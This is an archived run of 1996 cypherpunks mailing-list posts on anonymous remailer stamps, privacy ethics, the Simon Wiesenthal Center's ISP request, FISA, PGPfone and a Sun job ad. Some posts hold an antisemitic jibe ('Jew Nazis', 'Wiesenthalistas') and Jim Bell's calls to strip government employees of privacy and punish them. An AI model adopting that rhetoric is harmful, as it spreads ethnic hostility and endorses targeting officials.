apx76uAS8AlyNGgPC4jn0vOWsa++vPR/qddTLa+WZ/TEp4oYdxclgYzcR9szXn3d
fE6Nn9ur2PFx7zWb5OL/GOCJAJUDBRAwagneGrGpUK3dPgUBAdMIA/9VjejKbiOe
LmEcJP0yLx6xIVMzf0FcojsM4pF/rPQ2AbyNo2I8NR0XJTU8cq+8RntnYdk+GzEd
l1F0pTg+vSE5mrYAFhqhjUTRmwFmyLl8DP6qeLZ1jrBbiFQzGa2ryJvFc101BLNo
EH8Aw6rR0XpAGxdwAdTeizwDLxTxV8n/Eg==
=NDqF
- -----END PGP PUBLIC KEY BLOCK-----





-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPitSOQCP3v30CeZAQF7Igf+JxGu1D3t33Xo9ME1w5bmQAYWIyVGCUGu
OOVep+YcCxPK/xnEvul6BhyxMqAVXudw1u/U0kXvwJ366cWEts+AcTe7FdYBVt81
R/H9mJFCue9RvclyOPGL5th2fh94HtoslnqZ8Nu1CReMRjCU+kOrBsN4dZ9kMtxK
fNKc8VHDQk2tYPcnhkeDvvg1CJhVQIE6Hn7IjOrkMnKn0xz7qKnsfhu+ECMGFfJH
lC10iLS59BUztDtd+ye790lrEsk2Gp3OXrkBVR7ZE1QcehGUMOEspGJWq0bjsdW0
ftj4Nf+w+FVeYYCC+6XQSW7Dnvqs9tC1xV2LiSaCqdhS+KG1Iz2/+g==
=K8VR
-----END PGP SIGNATURE-----

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 14 Jan 1996 15:33:44 +0800
To: cypherpunks@toad.com
Subject: Re: Good Riddance to Wiesenthal and His Nazis
Message-ID: <2.2.32.19960114072240.0086b12c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:16 AM 1/11/96 -0800, you wrote:
>At 6:26 PM 1/10/96, Adam Shostack wrote:
>>        The Wiesenthal center is very influential in Jewish circles.
>>Attacking them directly would probably be a bad idea, and create bad
>>associations for anonymity amongst Jews.  (I'll come back to this.)
>
>I for one won't hesitate to criticize these Jew Nazis.

This thread is near to the end as the "Nazi Card" has been played...

It looks like "White Supremacists" are destined to become the "fifth
horseman", thus preserving the "law of fives".  I expect to see more uses of
this horseman to attempt to reign in the internet under the yoke of
Government control.  There should be a story on one of the news tabloid
shows any day now...

OBNonSequiter:  I was going through old mail and came upon a rant claiming
that "the End of the Government was at hand!".  It reminded me of some
discussions here about a year ago where various on the anarchist side were
declaring the "imminent death of the state" (GIF at 11).  A quote came to
mind...

"The death of the state is not going to be like some old man dying in the
corner.  It will be like an old man in a crowded building having an
epileptic seizure with lots of guns!"

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 14 Jan 1996 19:00:15 +0800
To: cypherpunks@toad.com
Subject: Buying Digital Postage Stamps Anonymously
Message-ID: <ad1de6f52c021004c32b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



This came up in today's Bay Area Cypherpunks meeting (a very good meeting,
by the way). It also has come up in a couple of the messages here, with
mention made that the stamp seller may know who is using his remailer
because he has records of who he sold the stamps (= numbers) to.

There are several standard solutions:

1. Two-way anonymous communication, and two-way anonymous e-cash.
("Wrappers" and all that stuff, stuff I don't here us talking about much
lately...)

2. "Stamp mixes," wherein users exchange stamps bought earlier. (This still
depends on trust that the seller will not have kept copies of the stamps
for his own use, thus wiping out the value of one's new stamps, or that he
won't keep records. Anonymity techniques in the mix could help with some of
these problems.)

3. Cash purchase with message pool posting.

This last one I'll spend a moment describing, as it is very easy to
understand, and is robust against a lot of attacks.

Alice wishes to buy 100 remailer stamps, each worth 20 cents. She places a
$20 U.S. banknote and a diskette containing a public key in an ordinary
paper envelope and mails it from a random mailbox to Bob. She also includes
a simple phrase to make it easier for her to later find the stamps, such as
"Rosebud." Bob creates the digital stamps, encrypts the list of them with
the public key provided, puts the name "Rosebud" on the file, and places it
on his Web page which is visited by many people daily, or, for more
security, posts it to a Usenet group devoted to such things (such as
alt.anonymous.messages).

Alice retrieves the digital stamps by either visiting Bob's Web site, with
some small amount of identity leakage possible, or reads the messages in
alt.anonymous.messages (with even less chance of leakage). Or, Alice could
use a Web proxy to more securely visit the site.

The net result is that Alice has $20 worth of digital stamps, Bob has a $20
bill and will honor the stamps he issued, and Bob doesn't know who he sold
them to.

This is how easily it could be done. Digital cash is not needed, at this
granularity ($20 bills sent through the mail), and simple trust works. (We
talk a lot about "reputations," and this is a concrete example. Protocols
that "force" Bob to honor a digital stamp, instead of relying on his
willingness to honor his promises, are vastly harder to design and use than
are such simple, micro-trust transactions.)

Different remailers would have different stamps, different rates, etc., and
a remailer script (for a "premail"-like app?) could take the remailer hops
planned, pull a stamp off the list of unused stamps, and put the number in
a remailer-like header field, such as:

::
Digital-Stamp: 5he20o#xL3p01SA29s

The receiving remailer would decrypt the message with its private key,
check the digital stamp field (as above, or in a real header format,
whatever), and see if the stamp is in its list of "issued, but unused"
stamps. And so on, in the obvious way.

Seems straightforward to do.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 14 Jan 1996 19:08:34 +0800
To: cypherpunks@toad.com
Subject: Re: Respect for privacy != Re: exposure=deterence?
In-Reply-To: <m0tbMrS-0008xFC@pacifier.com>
Message-ID: <Pine.ULT.3.91.960114024626.20241K-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 13 Jan 1996, jim bell wrote:

> 1.  Individual private citizens acting on their own deserve privacy and
> anonymity.
> 2.  Government employees receiving paychecks based on tax dollars stolen
> from members of the public do not.

Disregarding the high-falutin' diction, why not?

Certainly, expose everything they do at work, but I don't see that 
tracking someone down personally serves any purpose.

> 3.  Individuals not harming others deserve privacy and anonymity.
> 4.  Government employees threatening citizens with large fines and jail
> time, for doing what we consider right and good, do not.

I strongly disagree, and the fact that it's a government is irrelevant. 
Everybody deserves privacy: criminals, government employees, and people
you like as well. Of course, you have the right to investigate any person,
in keeping with the law. Public figures must give up some privacy to help
ensure that they are not involved in blatant (I did say blatant) conflicts
of interest, and they lose certain points in libel cases, but it should 
not go beyond that. 

-rich
  "Microsoft has opted not to include certain components of NT in the
   evaluation process, not because they would not pass the evaluation,
   but to save time by reducing the load on the NSA."

   C2 Evaluation and Certification for Windows NT
   http://www.microsoft.com/kb/bussys/winnt/q93362.htm

   [Whether they mean saving load on the testing team or on
   subsequent NSA investigations involving NT machines is not
   specified.]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 14 Jan 1996 16:10:27 +0800
To: cypherpunks@toad.com
Subject: Re: exposure=deterence?
In-Reply-To: <199601140345.VAA26416@intellinet.com>
Message-ID: <Mky=ToC00YUv5EDHEM@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 13-Jan-96 exposure=deterence? by
Charlie Merritt@intellin 
> We need the credits now that the movie is over.
> How much money was spent?  [FOI anyone?]

If the investigation is indeed over, a FOI request is possible, no?

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 14 Jan 1996 02:49:05 +0800
To: hallam@w3.org
Subject: Re: Shimomura on BPF, NSA and Crypto
In-Reply-To: <9601131747.AA11926@zorch.w3.org>
Message-ID: <199601131828.FAA01537@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> >Tsutomu has lots of glib rhetoric about how he just builds tools and
> >they can be used for good or evil.  This tool is custom-designed for
> >evil.  
> 
> Rubbish, it would allow me to do something I urgently need to do - measure the 
> performance of the main internet links. This is presently very difficult to do 
> since the berkley sockets provide no network performance information to the 
> application layer.
[..]

The standard BPF does exactly what you want already. Can you say tcpdump?
I think some research is inorder before you go shooting off your mouth.

-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  stood still, who built the largest     |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 15 Jan 1996 07:45:08 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Re: Respect for privacy != Re: exposure=deterence?
Message-ID: <m0tbbnk-0008znC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:59 AM 1/14/96 -0800, Rich Graves wrote:
>On Sat, 13 Jan 1996, jim bell wrote:
>
>> 1.  Individual private citizens acting on their own deserve privacy and
>> anonymity.
>> 2.  Government employees receiving paychecks based on tax dollars stolen
>> from members of the public do not.
>
>Disregarding the high-falutin' diction, why not?
>
>Certainly, expose everything they do at work, but I don't see that 
>tracking someone down personally serves any purpose.

Tell that to Simon Weisenthal, who (until his recentconversion to statism)
was under the impression that tracking down people who did bad things for
the government was not only acceptable, but in fact laudatory.

>> 3.  Individuals not harming others deserve privacy and anonymity.
>> 4.  Government employees threatening citizens with large fines and jail
>> time, for doing what we consider right and good, do not.
>
>I strongly disagree, and the fact that it's a government is irrelevant. 

Since government is funded by stolen dollars, it ISN'T irrelevant.

>Everybody deserves privacy: criminals,

I agree, to the extent that an unconvicted person who happens to be a
criminal is also an ordinary citizen.

> government employees,

I _Disagree_, especially after they've committed crimes for the government.

> and people
>you like as well. Of course, you have the right to investigate any person,
>in keeping with the law.

If "the law" is used to protect government-employed criminals, then the law
is wrong and we should disregard that portion of it.

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 15 Jan 1996 07:56:50 +0800
To: cypherpunks@toad.com
Subject: Re: COMMUNITY CONNEXION REFUSES TO CENSOR INTERNET SERVICES
In-Reply-To: <2.2.32.19960114231553.00943bb4@panix.com>
Message-ID: <Pine.ULT.3.91.960114153117.23696N-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 14 Jan 1996, Duncan Frissell wrote:

> At 04:14 PM 1/14/96 +0000, attila wrote:
> >
> >	an excellent statement, sameer. many of our population around the 
> >    world will voice these sentiments, but how many will care to implement
> >    in the face of an onslaught by pressure groups, government, self-
> >    serving news services, etc?
> 
> Of the 7000+ ISPs on Earth, more than 1000.  More than enough.

To play Devil's Advocate here, I don't think this is as big a deal as
either side is making it out to be. At least according to dgillmor's
column in today's San Jose Mercury News, SW meant (or has "clarified" his
statements to mean) that he favors only limited remedial (not prior)
restraints on "hate speech" (whatever the hell that means) on Web pages
that approach "publishing" quality and distribution. SW does not favor 
and in fact opposes censoring newsgroups and email.

Throw that straw man away, and deal with these issues, as "clarified."

Of course some ISPs with no backbone will, and already do, censor 
newsgroups, but this is not what SW is asking for (at least, not now). 

I don't think any media outlet should be forced to carry something it 
finds objectionable. Libertarian notions like freedom of association and 
the fact that freedom of the press belongs to the guy who owns the damn 
press come into play here.

I very much applaud Sameer for his principles and hard work, but SW and 
the like have their own principles. They're not incompatible in a free 
society.

I'd love it if the Christian Coalition would start an ISP (they already
have a Web site and private local dialups for special staff), and control
access however they wanted. I certainly wouldn't subscribe, but maybe my
Dad would. Maybe then they'd start to understand the technical issues, and
start leaving everyone else alone. 

To some extent, this has happened with CBN and Liberty University (Pat 
Robertson and Jerry Falwell), which have marginalized themselves.

-rich
 owner-win95netbugs@lists.stanford.edu
 ftp://ftp.stanford.edu/pub/mailing-lists/win95netbugs/
 gopher://quixote.stanford.edu/1m/win95netbugs
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 15 Jan 1996 08:25:43 +0800
To: cypherpunks@toad.com
Subject: Re: Respect for privacy != Re: exposure=deterence?
In-Reply-To: <m0tbbnk-0008znC@pacifier.com>
Message-ID: <Pine.ULT.3.91.960114154741.23696O-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 14 Jan 1996, jim bell wrote:

> At 02:59 AM 1/14/96 -0800, Rich Graves wrote:
> >On Sat, 13 Jan 1996, jim bell wrote:
> >
> >> 1.  Individual private citizens acting on their own deserve privacy and
> >> anonymity.
> >> 2.  Government employees receiving paychecks based on tax dollars stolen
> >> from members of the public do not.
> >
> >Disregarding the high-falutin' diction, why not?
> >
> >Certainly, expose everything they do at work, but I don't see that 
> >tracking someone down personally serves any purpose.
> 
> Tell that to Simon Weisenthal, who (until his recentconversion to statism)
> was under the impression that tracking down people who did bad things for
> the government was not only acceptable, but in fact laudatory.

And then, pausing for breath only once, he wrote:
 
> >> 3.  Individuals not harming others deserve privacy and anonymity.
> >> 4.  Government employees threatening citizens with large fines and jail
> >> time, for doing what we consider right and good, do not.
> >
> >I strongly disagree, and the fact that it's a government is irrelevant. 
> 
> Since government is funded by stolen dollars, it ISN'T irrelevant.
> 
> >Everybody deserves privacy: criminals,
> 
> I agree, to the extent that an unconvicted person who happens to be a
> criminal is also an ordinary citizen.
> 
> > government employees,
> 
> I _Disagree_, especially after they've committed crimes for the government.

I find it difficult to equate the actions of a volunteer grand juror
(which is what we were originally discussing before your knee started
jerking so wildly) or IRS auditor with those of Mengele. I am aware that
some so-called libertarian leaders accuse the IRS of crimes against
humanity, but I think they're demagogic idiots. See the non-libertarian
FAQ, at http://world.std.com/~mhuben/libindex.html

SW does not go after any old Nazi, just those convicted in absentia for 
enumerated crimes against humanity.

> > and people
> >you like as well. Of course, you have the right to investigate any person,
> >in keeping with the law.
> 
> If "the law" is used to protect government-employed criminals, then the law
> is wrong and we should disregard that portion of it.

Of course I agree. Actually, at the Bay Area cpunks meeting the question
whether any law that can't logically be enforced is valid was brought up. 
Examples include the illegality of using credit information more than
eight (?) years old when evaluating a loan, proposed limitations on Web
spiders and Usenet archives, the Swedish laws that are supposed to outlaw
maintaining computerized records with just about any kind of information
about people without a license, and censorship in general.

Where we differ is that I think it's bad taste and bad ethics to invade
anyone's privacy. It's a question of "justifiable force" for me. I believe
just about everyone with any technical understanding who reads this list
has similar ethics. 

I don't post private email. I don't investigate politicians' home phone
numbers and past relationships. It's just not relevant, unless there's 
specific probable cause.

The threat of investigation is valid, and has a positive deterrent effect.
But no one should have to live under the assumption that she has no
privacy at all. 

-rich
 owner-win95netbugs@lists.stanford.edu
 ftp://ftp.stanford.edu/pub/mailing-lists/win95netbugs/
 gopher://quixote.stanford.edu/1m/win95netbugs
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Mon, 15 Jan 1996 08:22:28 +0800
To: attila <attila@primenet.com>
Subject: Re: COMMUNITY CONNEXION REFUSES TO CENSOR INTERNET SERVICES
Message-ID: <v02120d01ad1f4b3400c7@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


>        the SWC is a prime example of very narrow view which is trying to
>    "control" what we can say --unfortunately, SWC is guilty of the same
>    mind-control tactics as the core Nazi party which persecuted them  ==
>    a very poor example.  In Germany, trading on collective guilt they
>    will never stop feeding, they have effectively controlled the issue
>    so that _any_ speech or revision against their agenda is a hate crime,
>    and therefore a serious felony.
>
>        thank you for standing up to the Simon Weisenthal Center!

Ok, I know better than to get into:
a) Totally off topic discussions on lists
and even worse
b) Political, off topic discussions.

However, I really do feel its my obligation to offer a counterpoint to
Attila here. (Not a sanction of his own discussion, but a little debate.)
I do this because I had a long talk with someone who liked to use weighted
terms to speak against jews and jewish organizations, and am still a wee
bit sensitive.

What the SWC asked was idiotic. However, they are in no way guilty of the
same 'mind-control tactics as the core Nazi party.' That is exibitionism,
and is dangerous. They sent out a request asking ISPs to take an action.
They did not demand it, imply any sort of economic response, or direct
physical response. As for Germany, a number of different cultures were
attacked in WWII. On the one hand Jews are most often discussed, because
they were the most openly herded and vilified at the time. However, Russians,
Poles, Gypsies, Gays and many others were also sent to camps. Germany is
a very multicultural nation. The tensions, and issues of keeping a cap on
racism are very important. When neonazis killed the turkish family, thousands
of Germans turned out to show that they won't stand for such again. If that
is the result of actions taken by the SWC in the media, and in politics then
I'd say they have done a wonderful job overall.

As for attempts of revision. What sort of revision? If you mean historical
revision, like the groups which claim the Holocaust (again something which
affected many different groups) never happened, or was a Jewish conspiracy,
then I'm glad that sort of revision is seen as a hate crime.

The reason I'm so sensitive about these things is that the person I had a
debate with over this area before could see nothing done by Jews in a positive
light. Use of the media was whining, use of the law was sneaky, actual action
was nazism. Thus I'll stop now. I don't condone what the SWC asked for in this
case, and those who know my postings should know I strongly support privacy
and freedom of expression. I just equally feel that its my obligation when
certain things are posted, to not let little loaded comments go unrebutted.

(See whoever is there at the RSA conference this week.)

Jonathan

Sorry again for taking up the list's time.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Mon, 15 Jan 1996 09:51:23 +0800
To: cypherpunks@toad.com
Subject: java security job
Message-ID: <199601150139.RAA09298@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for posting this here if you consider it an abuse of the
mailing list ... we have a dickens of a time finding people
with the right skill set who are both interested and available
for internet security work.    

And by the way, the applet security story is documented somewhat
on http://java.sun.com/sfaq/

--Marianne

---------------------------------------------------------------

Java, Sun's programming environment for internet applications, is
building a great team.  This is a key project for Sun, with high
visibility both within the company and the industry.  This position is
located in the San Francisco Bay area in California.  (Currently we're
located in Palo Alto, but since we're growing, we'll have to move to a
new building sometime this year.  It'll be in the south bay
somewhere.)

Security Engineering Specialist

Candidate will be responsible for implementing secure protocols and
internet commerce in the Java language and the HotJava browser.
Knowledge of current and emerging Net commerce protocols, including
SSL, SHTTP, and the various forms of digitcal cash is required.
Candidates should be familiar with programming in an object-oriented
language.  Good verbal and written communication skills are necessary.
A BSCS required,; MSSCS highly desirable.  At least 5 years of
experience. You must be a US Citizen. 

Contact: 

E-mail:
jobs@java.sun.com
Please include resumes in ASCII (preferred) or PostScript format.

Fax:
(415) 786-7546<br>
Attention: Gilda Montesino

Post:

Gilda Montesino
Sun Microsystems, Inc.
2550 Garcia Ave., M/S MPK 17-201
Mountain View, CA 94043-1100





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 15 Jan 1996 10:18:32 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Re: Respect for privacy != Re: exposure=deterence?
Message-ID: <m0tbe6z-00091JC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:11 PM 1/14/96 -0800, Rich Graves wrote:

>> >Everybody deserves privacy: criminals,
>> 
>> I agree, to the extent that an unconvicted person who happens to be a
>> criminal is also an ordinary citizen.
>> 
>> > government employees,
>> 
>> I _Disagree_, especially after they've committed crimes for the government.
>
>I find it difficult to equate the actions of a volunteer grand juror
>(which is what we were originally discussing before your knee started
>jerking so wildly)

Are your political biases affecting your misinterpretation of my commentary? 
 A "volunteer grand juror" (is there really such a thing?!?) is not really 
an "employee of government."  ("Slave" is perhaps a more accurate 
terminology, especially if these people are unpaid and aren't really 
volunteers.)

What _I_ meant was that government employees deserve NO privacy, if for no 
other reason than that they've accepted tax dollars stolen from taxpayers.


> or IRS auditor with those of Mengele.

Ah!  A comparison that has MUCH more validity!

> I am aware that
>some so-called

"so-called"?  What do you mean, "so-called"?  

> libertarian leaders

"Libertarian leaders"?  _LEADERS_?  I'm a libertarian, and I have been one 
in name for 20 years, and I've never followed a "libertarian leader."  I 
don't even know if I could NAME a "libertarian leader." Maybe you're 
thinking of fascism, or communism, so some such movement that 
REQUIRES "leaders."


> accuse the IRS of crimes against humanity, 

Here's a question for you:  Is theft a "crime against humanity"?   It may be 
a crime against an individual citizen, but "against humanity"?  Is murder a 
"crime against humanity"?  Again, it may be a crime against one citizen, but 
"against humanity"?


Here's a CLUE, because you obviously need it so badly:  It isn't necessary 
for an act to be a "crime against humanity" to be a serious crime.  It 
sounds like you're trying to defend abusive government employees by setting 
up a "straw-man"-type argument:  Unless what they do is a "crime against 
humanity," everything's okay and they should be immune from retribution.  By 
this reasoning, merely threatening one individual with prosecution isn't a 
"crime against humanity" so they get to go home, safe and sound.

I disagree.  In spades.

>but I think they're demagogic idiots. 

Your political philosophy is showing.

>See the non-libertarian
>FAQ, at http://world.std.com/~mhuben/libindex.html

Sounds like it would be extraordinarily un-interesting.  


[deleted]

>Where we differ is that I think it's bad taste and bad ethics to invade
>anyone's privacy. It's a question of "justifiable force" for me. I believe
>just about everyone with any technical understanding who reads this list
>has similar ethics. 
>
>I don't post private email. I don't investigate politicians' home phone
>numbers and past relationships. It's just not relevant, unless there's 
>specific probable cause.

If  your philosophy is that people who have gotten away with crimes in the 
past should escape punishment, you are exercising a "consistent" philosophy, 
albeit one with which I will never agree.  More likely, however, you are 
just excusing the actions of GOVERNMENT EMPLOYEES AND POLITICIANS, in 
particular, and trying to dress it up as simply a matter of general privacy.  


>The threat of investigation is valid, and has a positive deterrent effect.

But it won't have a "positive deterrent effect" if it never happens.   With 
respect to this case, those who investigated and harassed Zimmermann, it 
MUST occur.

>But no one should have to live under the assumption that she has no
>privacy at all. 

In my opinion, nobody should have his property stolen by government action, 
and those who do it are thieves and should face harsh punishment.  If "your" 
government does this, and you tolerate it, YOU are part of the problem.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 15 Jan 1996 10:27:12 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: COMMUNITY CONNEXION...
In-Reply-To: <199601150023.BAA10721@utopia.hacktic.nl>
Message-ID: <199601150216.SAA18182@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@REPLAY.COM (Anonymous) writes:

 > I know the difference between *actual* genocide (like, the
 > kind a bunch of my family members died in) and what the SWC
 > does. Is that a grammatical question?

No one has accused the Wiesenthalistas of genocide.  We simply
want a free Net where all forms of hate, including the particular
flavor espoused by the Wiesenthalistas, may compete on a
Darwinian basis.

There is no need to support the tilting of the playing field by a
small number of extremists, who represent neither the perspective
of the public nor of most members of the Jewish faith.

I personally don't plan to waste my time reading any of the
aforementioned hate literature on the Net, and I care not at all 
whether it was authored by Whitopians, Zionists, Christers, or
Ufologists.  

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 15 Jan 1996 07:37:35 +0800
To: hallam@w3.org
Subject: Re: Shimomura on BPF, NSA and Crypto
In-Reply-To: <9601131747.AA11926@zorch.w3.org>
Message-ID: <199601142325.SAA26223@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> 
> >Tsutomu has lots of glib rhetoric about how he just builds tools and
> >they can be used for good or evil.  This tool is custom-designed for
> >evil.  
> 
> Rubbish, it would allow me to do something I urgently need to do -
> measure the performance of the main internet links. This is
> presently very difficult to do since the berkley sockets provide no
> network performance information to the application layer.

There is no need to have the code to provide such information conceal
the fact that it is on the machine, fake interrupt counts, etc.

> What I need is a means of determining the fragmentation, packet
> delay, throttling rate etc etc. This is information avaliable in the
> Kernel but I don't know how to get at it.

There are plenty of tools on the average unix box for asking such
questions, and all kernel variables can be read via /dev/kmem in any
case.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Mon, 15 Jan 1996 13:46:56 +0800
To: cypherpunks@toad.com
Subject: Re: CAQ - Secret FISA Court Violates Rights (fwd)
In-Reply-To: <ad1efede040210044749@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.960114191757.28537A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
  The Foreign Intelligence Surveillance Court is dicussed in 
 
          James Bamford 
 
          The Puzzle Palace (with a new Afterword) 
 
          Penguin Books 
 
          1983 
 
          ISBN 0 14 00.6748 5 
 
 
  at pages 463, 465-66. 
 
  The Foreign Intelligence Surveillance Act is discussed at 
  pages 462-69, 475. 
 
 
  Cordially, 
 
  Jim 
 


 










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 15 Jan 1996 09:01:44 +0800
To: cypherpunks@toad.com
Subject: Above the Law
Message-ID: <199601150045.TAA20327@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   David Burnham, a distinguished journalist, has published:

      Above the Law: Secret Deals, Political Fixes, and Other
      Misadventures of the U.S. Department of Justice;
      Scribner; 1996. 444 pp. $27.50. ISBN 0-684-80699-1

   The chapter, "Keeping Track of the American People: The
   Unblinking Eye and Giant Ear," nails wizard surveillance,
   surreptitous entry and other security-beats-privacy 
   technotoxins:

      A solid argument can be made that in shaping and
      directing the FBI's investigative technologies from the
      late 1970s to the mid-1990s, Al Bayse, assistant FBI
      director, Technical Services Division, may well be the
      nation's single most influential law enforcement
      official since J. Edgar Hoover.

   Burnham cogently details DOJ and NSA plots, the bull-market
   in federal prosecutors, the pathology of "national
   security" abuse, encryption nightmares, subservient
   politics, careerism absent ethics. He admonishes "sleeping
   watchdogs" complicit with the nation's leading agency for 
   burgeoning instrusiveness.













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 15 Jan 1996 10:51:04 +0800
To: cypherpunks@toad.com
Subject: Re: CAQ - Secret FISA Court Violates Rights (fwd)
Message-ID: <ad1efede040210044749@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:40 AM 1/15/96, Brad Dolan wrote:

>operating in the U.S.13  Physical searches to gather foreign
>intelligence depend on secrecy,  argued Deputy Attorney General
>Jamie Gorelick.  If the existence of these searches were known to
       ^^^^^^^^

Odd that government officials are now being named after their main functions.

Or perhaps he is related to pop music saxophonist Kenny G.?


--Klaus! (banned by the SWC)


We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Mon, 15 Jan 1996 14:17:29 +0800
To: cypherpunks@toad.com
Subject: PRETTY GOOD PHONE PRIVACY, TOO
Message-ID: <Pine.BSD.3.91.960114200555.28537B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friends, 
 
 
  01 14 96 Edupage includes: 
 
  PRETTY GOOD PHONE PRIVACY, TOO
 
  Now from the creator of PGP encryption software comes a new 
  product for making your phone calls more private.  Philip 
  Zimmermann's PGPfone software scrambles phone calls made 
  through a computer modem using a complex algorithm called 
  Blowfish, which rearranges the digital version of your voice 
  conversation and then decodes it at the other end.  The result 
  is an intelligible -- though not high-quality -- totally pri- 
  vate conversation. 
 
  The URL is:
 
              http://web.mit.edu/network/pgpfone 
 
   
  (Popular Science Jan 96 p43)
 
 
  Cordially, 
 
  Jim 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 15 Jan 1996 18:11:32 +0800
To: cypherpunks@toad.com
Subject: CAQ - Secret FISA Court Violates Rights (fwd)
Message-ID: <Pine.SOL.3.91.960114204002.14125C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Subject: CAQ - Secret FISA Court Violates Rights


     C O V E R T   A C T I O N
I N F O R M A T I O N   B U L L E T I N
==========================================
CovertAction Quarterly has won numerous awards for investigative
journalism. It is read around the world by investigative reporters,
activists, scholars, intelligence buffs, news junkies, and anyone
who wants to know the news and analysis behind the soundbites and
headlines. Recommended by Noam Chomsky; targeted by the CIA.  

Each article in the 64-page magazine, which is in its 16th year of
publication, is extensively footnoted and accompanied by
photographs and graphics. 
==============================
 For a single issues send $6.  
 A one year subscription:  US $22;  /  Canada/Mexico $27; 
 Latin America/Europe $33;  /  Other areas $35.  

 Please send check or money order in $US to:  
